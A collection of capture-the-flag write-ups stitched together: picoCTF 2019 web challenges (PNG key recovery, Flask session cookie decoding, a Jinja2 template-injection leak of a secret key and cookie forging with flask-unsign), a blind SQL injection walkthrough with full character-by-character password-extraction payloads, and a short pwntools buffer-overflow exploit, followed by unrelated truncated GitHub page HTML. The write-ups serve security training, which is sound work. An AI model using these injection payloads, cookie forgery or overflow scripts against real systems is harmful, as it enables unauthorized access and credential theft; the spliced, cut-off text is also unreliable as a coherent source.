> The image link appears broken... https://2019shell1.picoctf.com/problem/10188 or http://2019shell1.picoctf.com:10188
### Hints
> This is only a JavaScript problem.
### Solution
Looking at the source code of the website, we see a script that seems to be constructing our image by manipulating some values in an array named "bytes", and our input, otherwise called key in the code.

We get the bytes array through the browser console:

The script seems to be doing
> 1. Use the input as the key> 2. For each number in the key, convert the string to the actual number(char()-48), store it in variable `i`> 3. Get the byte value for the resultant PNG at position (i , j), by the following formula:
```javascriptfor(var j = 0; j < (bytes.length / LEN); j ++){ result[(j * LEN) + i] = bytes[(((j + shifter) * LEN) % bytes.length) + i]}```
> 4. Remove all trailing zeros from the file> 5. Use the result as the source for the PNG displayed on the page
Looking at the [file signature](https://www.garykessler.net/library/file_sigs.html) for a PNG file, we see that the first 8 bytes of the file have to be `89 50 4E 47 0D 0A 1A 0A`, and the trailing 8 bytes have to be `49 45 4E 44 AE 42 60 82`. We can thus write a python script to find us possible values for the first 8 digits of the key using the header, and the last 8 digits using the trailer, giving us the final key.
For the first 8 digits:
```pythonbyte_list = [61,180,159,7,201,26,191,...]png_header = [0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A]print 'First 8 digits:'for head in range(8): for i in xrange(len(byte_list)): if byte_list[i] == png_header[head]: if (i-head)%16 ==0: print (i-head)/16,```
This gives us the first 8 digits - `74478291`.
For the last 8 digits, the actual result might include a bunch of 0s at the end, instead of the actual trailer, as we see that the javascript script actually does work to remove these just before the image is used as a source. We thus try our luck with the ending being `00 00 00 00 00 00 00 00` first, as we notice multiple 0s in the bytes array, leading us to believe that some of these might actually be at the end. We get a list of possible numbers for the last 8 digits of the key with this script:
```pythoncount = 0png_trailer = [0,0,0,0,0,0,0,0]print ''print 'Possibilities for the last 8 digits:'for head in range(8): for i in xrange(len(byte_list)): if byte_list[i] == png_trailer[head]: if (i-head-8)%16 ==0 and (i-head-8)/16<10: print (i-head+1)/16, print 'Digit '+ str(count) count += 1```
We then use the following to iterate through the combination possibilities:
```pythonfirst = ['0']second = ['8','9']third = ['0','1','2']fourth = ['1','3','4']fifth = ['3','5','6']sixth = ['2','4']seventh = ['9']eighth = ['6']arr =[first,second,third,fourth,fifth,sixth, seventh,eighth]trailer_combi = list(itertools.product(*arr))
header = '74478291'count=0
print '\n\nPossible keys, check output files:'for possible_tail in trailer_combi: key = header+''.join(possible_tail) result=[0]*688 for i in xrange(16): shifter = int(key[i]) for j in xrange(43): result[(j * 16) + i] = byte_list[(((j + shifter) * 16) % 688) + i] while not result[-1]: result.pop() if result[-8:] == png_trailer: print key f = open('output'+str(count), 'wb') f.write(bytearray(result)) count +=1```
We use the command `pngcheck output*`, and notice that `output0` gives OK. We open it and see a qr code, whcih we use `zbarimg` to decode to get the flag:
`picoCTF{9e627a851b332d57435b6c32d7c2d4af}`
## Empire2(450)
### Problem
> Well done, Agent 513! Our sources say Evil Empire Co is passing secrets around when you log in: `https://2019shell1.picoctf.com/problem/39830/` ([link](https://2019shell1.picoctf.com/problem/39830/)), can you help us find it? or http://2019shell1.picoctf.com:39830
### Hints
> Pay attention to the feedback you get>> There is *very* limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.>> The database gets reverted every 2 hours if you do break it, just come back later
### Solution
We create an account and log in, noticing that there is a flask session cookie. [Decoding](https://www.kirsle.net/wizards/flask-session.cgi) the cookie gives us:
```javascript{ "_fresh": true, "_id": "8cd7ed88b8f2634ebe13cbb6c321c3090c11254effbb99924bf9037639c9fda127643b8e1c4ba5257fce7a193639ae2f5e2911ece327e48e43b386ef65618709", "csrf_token": "bf1d1303f409590730443f12541c77cdb97811e8", "dark_secret": "picoCTF{its_a_me_your_flag3f43252e}", "user_id": "3"}```
The cookie includes the flag:
`picoCTF{its_a_me_your_flag3f43252e}`
## Java Script Kiddie 2(450)
### Problem
> The image link appears broken... twice as badly... https://2019shell1.picoctf.com/problem/21890 or http://2019shell1.picoctf.com:21890
### Hints
> This is only a JavaScript problem.
### Solution
*TODO* but extremely similar to [JS Kiddie](#java-script-kiddie400). It is now a 32 digit key, however, only alternate digits matter so code similar to [JS Kiddie](#java-script-kiddie400) can be used here to get the results QR code. Decoding it gives the flag:
`picoCTF{e1f443bfe40e958050e0d74aec4daa48}`
## cereal hacker 1(450)
### Problem
> Login as admin. https://2019shell1.picoctf.com/problem/47283/ or http://2019shell1.picoctf.com:47283
### Solution
*TODO*, but is a simple cookie SQLi, with initial login as guest/guest.
## Empire3(500)
### Problem
> Agent 513! One of your dastardly colleagues is laughing very sinisterly! Can you access his todo list and discover his nefarious plans? `https://2019shell1.picoctf.com/problem/47271/` ([link](https://2019shell1.picoctf.com/problem/47271/)) or http://2019shell1.picoctf.com:47271
### Hints
> Pay attention to the feedback you get>> There is *very* limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.>> The database gets reverted every 2 hours if you do break it, just come back later
### Solution
Similarly to [Empire2](#empire2450), we can decode the cookie, and we see that we now need to edit the cookie to user id 1 or 2, both of which seem to be admin. However, to encrypt the data back into a usable cookie, we need to sign it with a secret.
Going into the `Add a Todo` page and inputting `{{config}}`, we can see all the items under the flask configuration of the website. This utilises a [Server Side Template Injection(SSTI)](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection), specifically a vulnerability in the Jinja2 template that Flask uses.
Now viewing `Your Todos`, we get the `secret_key`, `'11e524344575850af46c19681f9baa0d'`.
Now we can use a [flask cookie encoder](https://github.com/Paradoxis/Flask-Unsign) to generate our desired cookie.
```shellflask-unsign --sign --cookie "{'_fresh': True, '_id': 'da00c2f44206c588ee050cd3e467e96d1ccfbd7f121c497442c70e7e7ad0cd08c1f7c8e967301b5beb1740d0c35dc5cc9ff421d0c0914a30a91364c5e35bc294', 'csrf_token': 'ab946d3f256cc7eafed0821f8a70aa18c63f620b', 'user_id': '2'}" --secret '11e524344575850af46c19681f9baa0d'```
Injecting the output as the cookie and going into `Your Todos`, we get the flag:
`picoCTF{cookies_are_a_sometimes_food_404e643b}`
## cereal hacker 2(500)
### Problem
>Get the admin's password. https://2019shell1.picoctf.com/problem/62195/ or http://2019shell1.picoctf.com:62195
### Solution
*TODO*, but was essentially using a PHP filter wrapper to leak source code, get credentials to a mySQL server running on the picoCTF shell localhost, logging in, and doing a blind SQLi to get admin's password, which was also the flag
Flag:
`picoCTF{c9f6ad462c6bb64a53c6e7a6452a6eb7}`
|
# ▼▼▼PASSWORD_EXTRACTION(Web:50pts,211/661=31.9%)▼▼▼This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
---
## 【Identify database】
```username=&password='union select 1,1-- ⇒ Invalid login info. username=&password='union select 1,1--+ ⇒ You've successfully authorized, but that doesn't get you the password. ```↓
**SQL Injection** vulnerability exists ,and `+` Is required. This is the behavior of **MySQL**
---
## 【Finding an attack method】
`limit 1` is required because it is checked that the number of data that can be acquired is **one**
↓
```username=&password='or(1=1)limit 1--+ ⇒ You've successfully authorized, but that doesn't get you the password.username=&password='or(1=0)limit 1--+ ⇒ Invalid login info.```
↓
The results are different. **Blind SQL Injection** is possible.
---
## 【Get table and column names】
```username=&password='or 97=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))--+ ⇒ausername=&password='or 99=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))--+ ⇒cusername=&password='or 99=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))--+ ⇒cusername=&password='or 111=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))--+ ⇒ousername=&password='or 117=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),5,1))--+ ⇒uusername=&password='or 110=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),6,1))--+ ⇒nusername=&password='or 116=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),7,1))--+ ⇒tusername=&password='or 115=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),8,1))--+ ⇒s```
↓
table name is `accounts`
---
```username=&password='or 112=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),1,1))--+ ⇒pusername=&password='or 97=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),2,1))--+ ⇒ausername=&password='or 115=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),3,1))--+ ⇒susername=&password='or 115=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),4,1))--+ ⇒susername=&password='or 119=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),5,1))--+ ⇒wusername=&password='or 111=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),6,1))--+ ⇒ousername=&password='or 114=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),7,1))--+ ⇒rusername=&password='or 100=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),8,1))--+ ⇒d```
↓
column name is `username`,`password`
---
## 【Get flag】
```username=&password='or 103=ascii(substr(password,1,1)) limit 1--+ ⇒gusername=&password='or 105=ascii(substr(password,2,1)) limit 1--+ ⇒iusername=&password='or 103=ascii(substr(password,3,1)) limit 1--+ ⇒gusername=&password='or 101=ascii(substr(password,4,1)) limit 1--+ ⇒eusername=&password='or 109=ascii(substr(password,5,1)) limit 1--+ ⇒musername=&password='or 123=ascii(substr(password,6,1)) limit 1--+ ⇒{~(省略)~username=&password='or 125=ascii(substr(password,26,1)) limit 1--+ ⇒}```
↓
`gigem{h0peYouScr1ptedTh1s}` |
```from pwn import *import structrem = remote("jh2i.com",50039)print(rem.recv())OFFSET = 0x44buff = 'A' * OFFSETbuff+=b"\xf6\x84\x04\x08" # get_flag addressprint(buff)rem.sendline(buff)print(rem.recv())#LLS{if_only_eagle_would_buffer_overflow}``` |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>ctf-writeups/Midnight Sun CTF 2020 Quals/pwn/pwny racing 3 at master · KEERRO/ctf-writeups · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="C62C:76EE:1CC8D8C4:1DA5EBC5:6412217E" data-pjax-transient="true"/><meta name="html-safe-nonce" content="661f9c4bd9231fc9be043f2236b14cfcc8ea73f5d0e0ed5a7ebdec82b01f5a99" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJDNjJDOjc2RUU6MUNDOEQ4QzQ6MURBNUVCQzU6NjQxMjIxN0UiLCJ2aXNpdG9yX2lkIjoiMzIyNjM5MTA0ODAyNTY3ODIwNiIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImZyYSJ9" data-pjax-transient="true"/><meta name="visitor-hmac" content="246248c785b61a3a4db5a4d712d8a7ac808ee77acdd85f54349c63576ff88dcf" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:162845937" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/e68933ac284b7f665c8ea555e19d7e6118920c67571ea8ca1312106e9058e23e/KEERRO/ctf-writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="ctf-writeups/Midnight Sun CTF 2020 Quals/pwn/pwny racing 3 at master · KEERRO/ctf-writeups" /><meta name="twitter:description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/e68933ac284b7f665c8ea555e19d7e6118920c67571ea8ca1312106e9058e23e/KEERRO/ctf-writeups" /><meta property="og:image:alt" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="ctf-writeups/Midnight Sun CTF 2020 Quals/pwn/pwny racing 3 at master · KEERRO/ctf-writeups" /><meta property="og:url" content="https://github.com/KEERRO/ctf-writeups" /><meta property="og:description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/KEERRO/ctf-writeups git https://github.com/KEERRO/ctf-writeups.git">
<meta name="octolytics-dimension-user_id" content="46076094" /><meta name="octolytics-dimension-user_login" content="KEERRO" /><meta name="octolytics-dimension-repository_id" content="162845937" /><meta name="octolytics-dimension-repository_nwo" content="KEERRO/ctf-writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="162845937" /><meta name="octolytics-dimension-repository_network_root_nwo" content="KEERRO/ctf-writeups" />
<link rel="canonical" href="https://github.com/KEERRO/ctf-writeups/tree/master/Midnight%20Sun%20CTF%202020%20Quals/pwn/pwny%20racing%203" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
